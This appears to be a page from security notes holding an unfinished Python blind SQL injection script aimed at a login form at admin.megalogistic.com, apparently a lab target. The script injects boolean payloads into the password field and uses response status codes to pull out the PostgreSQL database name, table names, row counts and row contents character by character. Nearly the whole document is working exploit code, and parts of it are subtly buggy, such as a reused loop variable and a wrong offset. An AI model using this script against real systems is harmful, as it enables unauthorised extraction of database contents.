Blind SQLi script
Note: Work in progress...
#!/usr/bin/python3
import requests
import sys
import banner
chr = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
'w', 'x', 'y', 'z', 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '-', '_', '.','(',')',',']
# [DB Variables]
db_len=0
db_name=""
tb_count=0
tb_name_length={}
tb_name={}
tb_rows={}
if(len(sys.argv)<2):
print("Command: ./blind-sqli.py -d <SQL-data for e.g. database-name> -s <true-condition-status-code>\n\nSupported SQL Languages:\n*PostgreSQL")
else:
# [Request Setup]
temp=sys.argv.index('-d')+1
sqldata=str(sys.argv[temp])
temp=sys.argv.index('-s')+1
statuscode=str(sys.argv[temp])
url="https://admin.megalogistic.com/"
data="username=admin&password={inject}"
reqheaders={'Content-Type':'application/x-www-form-urlencoded'}
# cookies={'':''}
# r = requests.post(url, data=post_parameters, headers=headers, cookies=cookies)
# [Database Name]
# 1. DB Length
flag=1
ctr=1
while(flag):
sqlquery="') or length(current_database())="+str(ctr)+"--"
temp=data.replace('{inject}',sqlquery)
temp2=dict()
for i in temp.split("&"):
temp2[i.split("=",1)[0]] = i.split("=",1)[1]
r = requests.post(url, data=temp2,headers=reqheaders,verify=False, allow_redirects=False)
if(str(r.status_code) == str(statuscode)):
flag=0
else:
ctr+=1
db_len = ctr
print("Length(Database Name)=",str(db_len))
# 2. DB Name
for m in range(1,db_len+1):
for j in range(len(chr)):
sqlquery = "') or substring(current_database(),"+str(m)+",1)='" + chr[j] + "'--"
temp = data.replace('{inject}', sqlquery)
temp2 = dict()
for i in temp.split("&"):
temp2[i.split("=", 1)[0]] = i.split("=", 1)[1]
r = requests.post(url, data=temp2, headers=reqheaders, verify=False, allow_redirects=False)
if (str(r.status_code) == str(statuscode)):
db_name+=chr[j]
break
else:
continue
print("Database Name=", db_name)
# [where table_schema='public'] are user created tables
# 3. No. of Tables in Current DB
flag = 1
ctr = 1
while (flag):
sqlquery = "') or (select count(TABLE_NAME)="+str(ctr)+" from information_schema.tables where table_schema='public')--"
temp = data.replace('{inject}', sqlquery)
temp2 = dict()
for i in temp.split("&"):
temp2[i.split("=", 1)[0]] = i.split("=", 1)[1]
r = requests.post(url, data=temp2, headers=reqheaders, verify=False, allow_redirects=False)
if (str(r.status_code) == str(statuscode)):
flag = 0
else:
ctr += 1
tb_count = ctr
print("No. of Tables=", str(tb_count))
# 4. Length of Table Names
for j in range(tb_count):
flag = 1
ctr = 1
while (flag):
sqlquery = "') or (select length(TABLE_NAME)="+str(ctr)+" from information_schema.tables where table_schema='public' limit 1 offset "+str(j)+")--"
temp = data.replace('{inject}', sqlquery)
temp2 = dict()
for i in temp.split("&"):
temp2[i.split("=", 1)[0]] = i.split("=", 1)[1]
r = requests.post(url, data=temp2, headers=reqheaders, verify=False, allow_redirects=False)
if (str(r.status_code) == str(statuscode)):
flag = 0
else:
ctr += 1
tb_name_length[j+1]=ctr
print("Length of name of table-"+str(j+1)+" :", str(tb_name_length[j+1]))
# 5. Table Names
for t in range(tb_count):
tb_name[t+1]=""
for m in range(1, tb_name_length[t+1] + 1):
for j in range(len(chr)):
sqlquery = "') or (select substring(TABLE_NAME,"+str(m)+",1)='"+chr[j]+"' from information_schema.tables where table_schema='public' limit 1 offset "+str(t)+")--"
temp = data.replace('{inject}', sqlquery)
temp2 = dict()
for i in temp.split("&"):
temp2[i.split("=", 1)[0]] = i.split("=", 1)[1]
r = requests.post(url, data=temp2, headers=reqheaders, verify=False, allow_redirects=False)
if (str(r.status_code) == str(statuscode)):
tb_name[t+1] += chr[j]
break
else:
continue
print("Name of table-"+str(t+1)+" :", tb_name[t+1])
# 6. No. of Rows in Tables
for j in range(tb_count):
flag = 1
ctr = 1
while (flag):
sqlquery = "') or (select count(*)="+str(ctr)+" from "+tb_name[j+1]+")--"
temp = data.replace('{inject}', sqlquery)
temp2 = dict()
for i in temp.split("&"):
temp2[i.split("=", 1)[0]] = i.split("=", 1)[1]
r = requests.post(url, data=temp2, headers=reqheaders, verify=False, allow_redirects=False)
if (str(r.status_code) == str(statuscode)):
flag = 0
else:
ctr += 1
tb_rows[j+1]=ctr
print("No. of rows in table-"+str(j+1)+" :", str(tb_rows[j+1]))
# 7. Data in rows
for t in range(tb_count):
rdata=""
for r in range(tb_rows[t+1]):
flag=1
l=1
while flag:
for j in range(len(chr)):
sqlquery = "') or (select substring(r::text,"+str(l)+",1)='"+chr[j]+"' from "+tb_name[t+1]+" AS r limit 1 offset "+str(t)+")--"
temp = data.replace('{inject}', sqlquery)
temp2 = dict()
for i in temp.split("&"):
temp2[i.split("=", 1)[0]] = i.split("=", 1)[1]
r = requests.post(url, data=temp2, headers=reqheaders, verify=False, allow_redirects=False)
if (str(r.status_code) == str(statuscode)):
rdata += chr[j]
l+=1
print(rdata)
if (chr[j] == ')'):
flag = 0
break
else:
continue
print("Row-"+str(r+1)+" of table-"+str(t+1)+" :"+ rdata)
Last updated